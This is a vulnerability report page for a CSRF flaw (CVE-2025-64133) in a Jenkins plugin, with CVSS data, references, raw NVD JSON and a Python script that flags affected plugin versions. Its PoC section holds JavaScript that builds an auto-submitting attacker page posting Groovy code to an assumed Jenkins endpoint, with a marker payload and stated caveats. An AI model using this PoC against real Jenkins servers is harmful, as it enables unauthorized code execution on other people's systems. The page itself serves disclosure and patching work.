Security Vulnerability Report
CVE-2025-64133 CVSS 5.4 MEDIUM

CVE-2025-64133

Published: 2025-10-29 14:15:57
Last Modified: 2025-12-22 15:24:39

Description

A cross-site request forgery (CSRF) vulnerability in Jenkins Extensible Choice Parameter Plugin 239.v5f5c278708cf and earlier allows attackers to execute sandboxed Groovy code.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:jenkins:extensible_choice_parameter:*:*:*:*:*:jenkins:*:* - VULNERABLE
Jenkins Extensible Choice Parameter Plugin <= 239.v5f5c278708cf
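The affected range above is the check most practitioners need to run against an inventory of installed plugins. The following Python is an added example, not part of the NVD record or of the Jenkins project: it evaluates plugin entries in the shape returned by Jenkins' /pluginManager/api/json?depth=1 (fields shortName, version, active) and flags Extensible Choice Parameter Plugin versions at or below 239.v5f5c278708cf. Assumptions: the plugin's shortName is extensible-choice-parameter; the ".v<hash>" suffix of incrementals-style versions carries no ordering, so only the leading numeric components are compared; the inventory embedded below is constructed sample data.

```python
"""Offline exposure check for CVE-2025-64133 from Jenkins plugin inventory data.

Added example, not the NVD record's or the Jenkins project's own code.
Assumptions (not taken from the advisory): the plugin's shortName is
"extensible-choice-parameter", and Jenkins plugin versions order on their
leading numeric components only (".v<hash>" carries no ordering).
"""
import json
import re

PLUGIN_ID = "extensible-choice-parameter"   # assumed shortName of the plugin
LAST_AFFECTED = "239.v5f5c278708cf"         # last affected version per the CVE text


def version_key(version: str) -> tuple:
    """Map a Jenkins plugin version string to a comparable tuple of ints.

    '1.8.1'             -> (1, 8, 1)
    '239.v5f5c278708cf' -> (239,)   parsing stops at the first non-numeric
                                    component, so the hash is ignored
    A version with no numeric prefix maps to () and therefore sorts lowest,
    which makes the check conservative (flagged as affected).
    """
    parts = []
    for component in version.split("."):
        if not re.fullmatch(r"\d+", component):
            break
        parts.append(int(component))
    return tuple(parts)


def is_affected(version: str) -> bool:
    """True when the plugin version is at or below the last affected version."""
    return version_key(version) <= version_key(LAST_AFFECTED)


def find_vulnerable_plugins(plugin_manager_json: str) -> list:
    """Return (shortName, version, active) for installed affected plugins.

    Input is the JSON text of /pluginManager/api/json?depth=1. Disabled plugins
    are still reported (active=False) so the operator can see the install, but
    only an active plugin exposes the endpoint.
    """
    data = json.loads(plugin_manager_json)
    hits = []
    for plugin in data.get("plugins", []):
        if plugin.get("shortName") != PLUGIN_ID:
            continue
        version = plugin.get("version", "")
        if is_affected(version):
            hits.append((PLUGIN_ID, version, bool(plugin.get("active", True))))
    return hits


# Constructed sample inventory in the shape of /pluginManager/api/json?depth=1.
# Plugin versions other than the affected one are made up for the example.
SAMPLE_PLUGIN_MANAGER_JSON = json.dumps({
    "plugins": [
        {"shortName": "git", "version": "5.7.0", "active": True},
        {"shortName": "extensible-choice-parameter",
         "version": "239.v5f5c278708cf", "active": True},
        {"shortName": "script-security", "version": "1.vdeadbeef", "active": True},
    ]
})


if __name__ == "__main__":
    for short_name, version, active in find_vulnerable_plugins(SAMPLE_PLUGIN_MANAGER_JSON):
        state = "active" if active else "disabled"
        print(f"AFFECTED: {short_name} {version} ({state}) <= {LAST_AFFECTED}")
```

In practice the JSON comes from the running controller, e.g. curl with an administrator's API token against /pluginManager/api/json?depth=1, and its text is passed to find_vulnerable_plugins. Reading the plugin manager API requires administrative permission on the instance.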

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-64133 CSRF PoC for Jenkins Extensible Choice Parameter Plugin (<= 239.v5f5c278708cf).
// The attacker hosts a page that auto-submits a form to the victim's Jenkins. The victim's
// browser attaches its Jenkins session cookie, so the request runs with the victim's permissions.
//
// Caveats before relying on this PoC:
// - The endpoint path below is the PoC author's assumption. The vendor advisory (SECURITY-3583)
//   does not name the endpoint; confirm it against the plugin source for the version under test.
// - Jenkins enables CSRF protection (crumbs) by default, so a cross-site POST without a valid
//   crumb is rejected with HTTP 403. Jenkins plugin CSRF issues of this class are typically
//   endpoints that also accept GET; if this one does, change the form to method="GET".
// - The script runs in the Script Security sandbox. Calls such as 'whoami'.execute() are not
//   whitelisted and are rejected, so the payload is limited to what the sandbox permits.

const target = "http://TARGET-JENKINS"; // placeholder; replace with the instance under test
const endpoint =
  "/descriptorByName/org.jenkinsci.plugins.extensiblechoiceparameter.ParameterDescriber/checkScript"; // assumed path

// Sandbox-permitted payload: a marker string the tester can look for in logs or responses.
const script = "return 'CVE-2025-64133 csrf marker'";

// Malicious HTML page the attacker would host.
const pocHtml = `<!DOCTYPE html>
<html>
<head><title>Jenkins CSRF PoC - CVE-2025-64133</title></head>
<body>
<h1>Loading...</h1>
<form id="exploit" action="${target}${endpoint}" method="POST">
  <input type="hidden" name="script" value="${script}">
</form>
<script>document.getElementById('exploit').submit();</script>
</body>
</html>`;

// Attack flow:
// 1. Attacker hosts pocHtml on a site they control.
// 2. Attacker lures a logged-in Jenkins user to that page.
// 3. The browser submits the form with the victim's Jenkins session cookie attached.
// 4. If the endpoint is reachable without a crumb, Jenkins evaluates the script in the sandbox.
// 5. The response goes to the victim's browser, not the attacker (same-origin policy), so the
//    attacker only observes side effects; results may reach the attacker via other channels.

References

https://www.jenkins.io/security/advisory/2025-10-29/#SECURITY-3583 (Vendor Advisory)
http://www.openwall.com/lists/oss-security/2025/10/29/2 (Mailing List, Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64133", "sourceIdentifier": "[email protected]", "published": "2025-10-29T14:15:57.463", "lastModified": "2025-12-22T15:24:38.880", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A cross-site request forgery (CSRF) vulnerability in Jenkins Extensible Choice Parameter Plugin 239.v5f5c278708cf and earlier allows attackers to execute sandboxed Groovy code."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jenkins:extensible_choice_parameter:*:*:*:*:*:jenkins:*:*", "versionEndIncluding": "239.v5f5c278708cf", "matchCriteriaId": "0863FAFD-5437-4F08-859B-3808AE30641E"}]}]}], "references": [{"url": "https://www.jenkins.io/security/advisory/2025-10-29/#SECURITY-3583", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/10/29/2", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}